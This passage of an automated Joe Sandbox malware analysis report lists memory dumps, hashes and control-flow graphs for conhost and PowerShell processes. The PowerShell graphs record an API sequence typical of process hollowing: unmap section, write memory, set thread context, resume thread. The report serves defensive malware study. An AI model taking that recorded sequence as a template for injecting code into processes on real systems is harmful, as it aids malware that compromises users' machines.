                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: ConsoleMode
                                            • String ID:
                                            • API String ID: 4145635619-0
                                            • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                            • Instruction ID: 5acf61a40a10063d8b8c33adbbb132806e8fb0224878c91b87f0d2ea6da8ea87
                                            • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                            • Instruction Fuzzy Hash: A591C833710E618BF758DF65A4587AE3BA0F356B98F448207DE4A57A86DF34C449CB02
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                            • String ID:
                                            • API String ID: 2933794660-0
                                            • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                            • Instruction ID: a82012280eccb9f073b5079c7b0689b4e8b15b4bfc755422736fd43ed4942e3b
                                            • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                            • Instruction Fuzzy Hash: 1E112A66711F148AEB44CF60F8583AA33A4F71A758F440E22DA6D877A9DF78C1588381
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                            • Instruction ID: bd13ccdca84b03b02780847077ca1ded3aa34e4e026eb5695dd21320b8955053
                                            • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                            • Instruction Fuzzy Hash: B5718127710FA183EBB89F26F8583ABA794F386B84F454217DD4943B8ADE74C508C741
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000003.2867908713.000002A5AF330000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A5AF330000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_3_2a5af330000_conhost.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 3242871069-1018135373
                                            • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction ID: 431b515f25e7c6b4bace6a3a5830577b2c82f6e8d7bc1852fbac1a2b30461109
                                            • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction Fuzzy Hash: BC51B23B711E208BDB58CB19F448B6E3391E345B98F158727EA468778ADFB8C849C701
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000003.2867908713.000002A5AF330000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A5AF330000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_3_2a5af330000_conhost.jbxd
                                            Similarity
                                            • API ID: CallTranslator
                                            • String ID: MOC$RCC
                                            • API String ID: 3163161869-2084237596
                                            • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction ID: 3bf4a73daa7b797210bf1d27d02c50de8838503af5c35638a843d95e2410b488
                                            • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction Fuzzy Hash: 62616B33609BC4C2EB64DB19F44539AB7A1F786B88F044316EB9907B96CF78D198CB01
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                             • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                            • Instruction ID: 536e5c3af9786f9e5e3c3f01a9d2c01ebec96ba7f9275afef641aa95469c2408
                                            • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                            • Instruction Fuzzy Hash: D051B427304BA187EBAC9F25B45C7AFA651F397780F468227CD5943B4BDE35C4088741
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                             • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: ErrorFileLastWrite
                                            • String ID: U
                                            • API String ID: 442123175-4171548499
                                            • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                            • Instruction ID: 31b3f6641160006f2bf41c585b46778b1eedb991293f6485929de116cba04e72
                                            • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                            • Instruction Fuzzy Hash: 4441C263715A9087E754CF25F44879BB7A0F34A784F804223EA4D87B59EF78C449CB41
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                             • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: ExceptionFileHeaderRaise
                                            • String ID: csm
                                            • API String ID: 2573137834-1018135373
                                            • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                            • Instruction ID: ae8dfc81d5688e7c6396316f0a3d6c7474d4efdd5398251647dcb6ef88820bf7
                                            • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                            • Instruction Fuzzy Hash: 7B115B32315F9082EB688B15F84834AB7E1F789B84F684222EE8D07B69DF3CC555CB00
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                             • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID:
                                            • API String ID: 756756679-0
                                            • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                            • Instruction ID: b2719ea17ed0a135b16bbfcf844ee6686936b077b3cb979131d2b203a7f19b67
                                            • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                            • Instruction Fuzzy Hash: 5F115E22701F9086EB58DB66B40815B77B0F789FD1F584226DF4E5376ADF38D4468300
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                             • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                            • Instruction ID: 84c2f324b7f5c78be68e7115a67433384288e31ad71e789ecd7c6c1a19955391
                                            • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                            • Instruction Fuzzy Hash: B0E03932702A149BEB5CCB62E80834A36E1EB89B26F448126C90907355EF7D949DA741
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                             • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                            • Instruction ID: 20765164b1318a20aaa7dd8b179a37ba5adbeae8587c6dfd509d8823a760eb7c
                                            • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                            • Instruction Fuzzy Hash: 4FE06D727129149BEB5CCB22E80824A33E1FB89B22F448122C90907714EE3C949CA611
                                            Memory Dump Source
                                            • Source File: 00000020.00000002.2748625085.0000000004DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DFD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_32_2_4dfd000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 875db052c33f4cb95b9b4501e9f5ffa8e2bd911345a84c3d5fc34e7a796df31f
                                            • Instruction ID: 1106bdb23add92245a50c13f3757bdb31ce8bad43e88baeefed0353df7836432
                                            • Opcode Fuzzy Hash: 875db052c33f4cb95b9b4501e9f5ffa8e2bd911345a84c3d5fc34e7a796df31f
                                            • Instruction Fuzzy Hash: 0C012B71604340DAE7304E25ED84B67BF98EF41364F18C11ADF4A4F142C7B8E441C6B1
                                            Memory Dump Source
                                            • Source File: 00000020.00000002.2748625085.0000000004DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DFD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_32_2_4dfd000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3e125b7204577ed84621df69a71422e49a9849c341bb841d644149dd7c288a54
                                            • Instruction ID: c3a1d045317d99a6e96de1be091b03154fef262ce33046615d263dd2f39a1d22
                                            • Opcode Fuzzy Hash: 3e125b7204577ed84621df69a71422e49a9849c341bb841d644149dd7c288a54
                                            • Instruction Fuzzy Hash: A1014C6250E3C09EE7128B259D94B52BFB4EF43224F19C1DBDD888F1A3C2695849C7B2

                                            Execution Graph

                                             Execution Coverage: 7.6%
                                             Dynamic/Decrypted Code Coverage: 0%
                                             Signature Coverage: 42.9%
                                             Total number of Nodes: 28
                                             Total number of Limit Nodes: 0

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                             control_flow_graph
                                             • Nodes: 1082 7ffd343f0c7d-7ffd343f0c89; 1083 7ffd343f0c8b-7ffd343f0c93; 1084 7ffd343f0c94-7ffd343f0d08; 1088 7ffd343f0d0a-7ffd343f0d0f; 1089 7ffd343f0d12-7ffd343f0d55 (NtWriteVirtualMemory); 1090 7ffd343f0d57; 1091 7ffd343f0d5d-7ffd343f0d7a
                                             • Edges: 1082->1083, 1082->1084, 1083->1084, 1084->1088, 1084->1089, 1088->1089, 1089->1090, 1089->1091, 1090->1091
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000024.00000002.3044081865.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_36_2_7ffd343e0000_powershell.jbxd
                                            Similarity
                                            • API ID: MemoryVirtualWrite
                                            • String ID:
                                            • API String ID: 3527976591-0
                                            • Opcode ID: 0b29ae9c529ab447b690b42c1f866b09a9bb65fde65f26664db2805ae73e4fde
                                            • Instruction ID: 60a5e16088e0e038abdd3e2a1f1298002086c7af00f64b6ed70bee2ca4ea6820
                                            • Opcode Fuzzy Hash: 0b29ae9c529ab447b690b42c1f866b09a9bb65fde65f26664db2805ae73e4fde
                                            • Instruction Fuzzy Hash: 7331A23190CA4C8FDB18EF5C9885AE9BBF0FF5A321F04426ED049D3652DB74A806CB85

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                             control_flow_graph
                                             • Nodes: 1092 7ffd343ee098-7ffd343f0b28 (NtUnmapViewOfSection); 1103 7ffd343f0b2a; 1104 7ffd343f0b30-7ffd343f0b4c
                                             • Edges: 1092->1103, 1092->1104, 1103->1104
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000024.00000002.3044081865.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_36_2_7ffd343e0000_powershell.jbxd
                                            Similarity
                                            • API ID: SectionUnmapView
                                            • String ID:
                                            • API String ID: 498011366-0
                                            • Opcode ID: 84bb68df6dec345b87bb105aece335564ea3fe37cdee40174e10d0cf26906a35
                                            • Instruction ID: 64eda66556fe047d5c6451425c4e638ab86487b6f2406ea6c905157b33ccce86
                                            • Opcode Fuzzy Hash: 84bb68df6dec345b87bb105aece335564ea3fe37cdee40174e10d0cf26906a35
                                            • Instruction Fuzzy Hash: 97314472A0DA488FEB58DF5C9C5A6BA7BF0EBA6320F08406FD049D3152DA34A845C751

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                             control_flow_graph
                                             • Nodes: 1105 7ffd343ee0fa-7ffd343f0d08; 1109 7ffd343f0d0a-7ffd343f0d0f; 1110 7ffd343f0d12-7ffd343f0d55 (NtWriteVirtualMemory); 1111 7ffd343f0d57; 1112 7ffd343f0d5d-7ffd343f0d7a
                                             • Edges: 1105->1109, 1105->1110, 1109->1110, 1110->1111, 1110->1112, 1111->1112
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000024.00000002.3044081865.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_36_2_7ffd343e0000_powershell.jbxd
                                            Similarity
                                            • API ID: MemoryVirtualWrite
                                            • String ID:
                                            • API String ID: 3527976591-0
                                            • Opcode ID: c094f808c037d31b5d20e1ed7a6e70b025586da0cd87c71aaf0b3792231bd758
                                            • Instruction ID: 4cc1995a78c945e8af671a77df225b55bc5a731890720447ffa340a60ed70bbd
                                            • Opcode Fuzzy Hash: c094f808c037d31b5d20e1ed7a6e70b025586da0cd87c71aaf0b3792231bd758
                                            • Instruction Fuzzy Hash: 1831A27190CA1C8FDB58EF5CD845AF9BBF0FB59311F00422ED04AD3252CB74A8068B85

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                             control_flow_graph
                                             • Nodes: 1113 7ffd343ee0a8-7ffd343f0b28 (NtUnmapViewOfSection); 1123 7ffd343f0b2a; 1124 7ffd343f0b30-7ffd343f0b4c
                                             • Edges: 1113->1123, 1113->1124, 1123->1124
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000024.00000002.3044081865.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_36_2_7ffd343e0000_powershell.jbxd
                                            Similarity
                                            • API ID: SectionUnmapView
                                            • String ID:
                                            • API String ID: 498011366-0
                                            • Opcode ID: 6427f0a1e4414fa63f8539699452f425b45a523136b24a674c96e68ab62bfb46
                                            • Instruction ID: 287f36019c2ec2fa2ce7a9fb4b56f88d82efd0c67da839dcfdd28d9ee3a543c5
                                            • Opcode Fuzzy Hash: 6427f0a1e4414fa63f8539699452f425b45a523136b24a674c96e68ab62bfb46
                                            • Instruction Fuzzy Hash: DB313632A0DB488FEB58DF5C8C4A7B97BF0EBA6320F04416FD049D3152DA34A845C751

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                             control_flow_graph
                                             • Nodes: 1125 7ffd343f0a5e-7ffd343f0a6b; 1126 7ffd343f0a76-7ffd343f0b28 (NtUnmapViewOfSection); 1127 7ffd343f0a6d-7ffd343f0a75; 1131 7ffd343f0b2a; 1132 7ffd343f0b30-7ffd343f0b4c
                                             • Edges: 1125->1126, 1125->1127, 1126->1131, 1126->1132, 1127->1126, 1131->1132
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000024.00000002.3044081865.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_36_2_7ffd343e0000_powershell.jbxd
                                            Similarity
                                            • API ID: SectionUnmapView
                                            • String ID:
                                            • API String ID: 498011366-0
                                            • Opcode ID: 38fc070d5a908509e948cefaf4443a53e06a2dcd49e8a51e53b98db855bf7802
                                            • Instruction ID: 4dc0a54d941e7bf4ea81884a8bf23bc1c74465e80b838c6a323f58394a9c774e
                                            • Opcode Fuzzy Hash: 38fc070d5a908509e948cefaf4443a53e06a2dcd49e8a51e53b98db855bf7802
                                            • Instruction Fuzzy Hash: 4231E73160C7888FDB55DB6888557E97FF0EF57320F04419BD049D7193D674A845CB92

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                             control_flow_graph
                                             • Nodes: 1133 7ffd343f1004-7ffd343f100b; 1134 7ffd343f1016-7ffd343f10c2 (NtResumeThread); 1135 7ffd343f100d-7ffd343f1015; 1139 7ffd343f10ca-7ffd343f10e6; 1140 7ffd343f10c4
                                             • Edges: 1133->1134, 1133->1135, 1134->1139, 1134->1140, 1135->1134, 1140->1139
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000024.00000002.3044081865.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_36_2_7ffd343e0000_powershell.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: bdfa301e91d9450051c6975da739ecd7c3d45f7014dae6de278f97e8154a02a8
                                            • Instruction ID: fc1d9f664102523a645091e2f8810900d950df4c54e0126e48f682a4583a31d4
                                            • Opcode Fuzzy Hash: bdfa301e91d9450051c6975da739ecd7c3d45f7014dae6de278f97e8154a02a8
                                            • Instruction Fuzzy Hash: 9331C131A0CA5C8FDB58EB98D8867E9BBE1EF56320F04416BD409D3252DA74A846CB91

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                             control_flow_graph
                                             • Nodes: 1141 7ffd343ee0c8-7ffd343f0b28 (NtUnmapViewOfSection); 1146 7ffd343f0b2a; 1147 7ffd343f0b30-7ffd343f0b4c
                                             • Edges: 1141->1146, 1141->1147, 1146->1147
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000024.00000002.3044081865.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_36_2_7ffd343e0000_powershell.jbxd
                                            Similarity
                                            • API ID: SectionUnmapView
                                            • String ID:
                                            • API String ID: 498011366-0
                                            • Opcode ID: 0dc52daa855a0d5f8b8deb6acbdcb132a5620989d1d8eb4b79ec18cb9c48fb03
                                            • Instruction ID: 120b090b5532333ad1703a5a044a32a76ea467ec99b9561bb9bfa105429bee53
                                            • Opcode Fuzzy Hash: 0dc52daa855a0d5f8b8deb6acbdcb132a5620989d1d8eb4b79ec18cb9c48fb03
                                            • Instruction Fuzzy Hash: 9B217371A0CA088FDB58DF9CD8567E97BE0EB5A320F04416FD049D3252DA74A856CB91

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                             control_flow_graph
                                             • Nodes: 1148 7ffd343ee142-7ffd343f10c2 (NtResumeThread); 1152 7ffd343f10ca-7ffd343f10e6; 1153 7ffd343f10c4
                                             • Edges: 1148->1152, 1148->1153, 1153->1152
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000024.00000002.3044081865.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_36_2_7ffd343e0000_powershell.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: 5c64ce90b26c0245c61d8c00e30addf05d1236baea9a134fa7762220fde6eddf
                                            • Instruction ID: 82b44f1170be5c87e414c7f54f0e4814c189ca5e411fb6d1cbd937aa10fcc4c2
                                            • Opcode Fuzzy Hash: 5c64ce90b26c0245c61d8c00e30addf05d1236baea9a134fa7762220fde6eddf
                                            • Instruction Fuzzy Hash: F9217F71A08A1C8FDF58EF9CD889BEABBF1EB59311F04416AD409D3255DB70A8428B91

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                             control_flow_graph
                                             • Nodes: 1154 7ffd343f0f40-7ffd343f0fd8 (NtSetContextThread); 1158 7ffd343f0fda; 1159 7ffd343f0fe0-7ffd343f0ffc
                                             • Edges: 1154->1158, 1154->1159, 1158->1159
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000024.00000002.3044081865.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_36_2_7ffd343e0000_powershell.jbxd
                                            Similarity
                                            • API ID: ContextThread
                                            • String ID:
                                            • API String ID: 1591575202-0
                                            • Opcode ID: 393bd975abb0dc9022c651b09fed7b913efbe9edbcff2410e94465a8033bf3e0
                                            • Instruction ID: 82910c0cd9a67f310e0c873ade08393d30bbe04370ecb415c1ca1f26fa5928da
                                            • Opcode Fuzzy Hash: 393bd975abb0dc9022c651b09fed7b913efbe9edbcff2410e94465a8033bf3e0
                                            • Instruction Fuzzy Hash: 39218031A0CA4C8FDB58EF9CD8867E97BF0EB5A320F04416BD049D3252CA759846CB91
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000024.00000002.3044081865.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_36_2_7ffd343e0000_powershell.jbxd
                                            Similarity
                                            • API ID: ContextThread
                                            • String ID:
                                            • API String ID: 1591575202-0
                                            • Opcode ID: e8367fcb7246de5fc202db9e548cbfc1e24a7f1ed60d1d05e10fc51027702633
                                            • Instruction ID: 966b70a68b5d3b025633e9b9aa3243191711b24e8b0be5fe34fd50efbe606c25
                                            • Opcode Fuzzy Hash: e8367fcb7246de5fc202db9e548cbfc1e24a7f1ed60d1d05e10fc51027702633
                                            • Instruction Fuzzy Hash: 61216271A08A0C8FDF58EF9CD84A7F977E4EB59321F00412ED04DD3256DA75A846CB91
                                            Memory Dump Source
                                            • Source File: 00000024.00000002.3046355367.00007FFD344B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_36_2_7ffd344b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Memory Dump Source
                                            • Source File: 00000024.00000002.3046355367.00007FFD344B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_36_2_7ffd344b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000024.00000002.3044081865.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_36_2_7ffd343e0000_powershell.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000024.00000002.3044081865.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_36_2_7ffd343e0000_powershell.jbxd
                                            Similarity
                                            • API ID: CreateFileMapping
                                            • String ID:
                                            • API String ID: 524692379-0

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
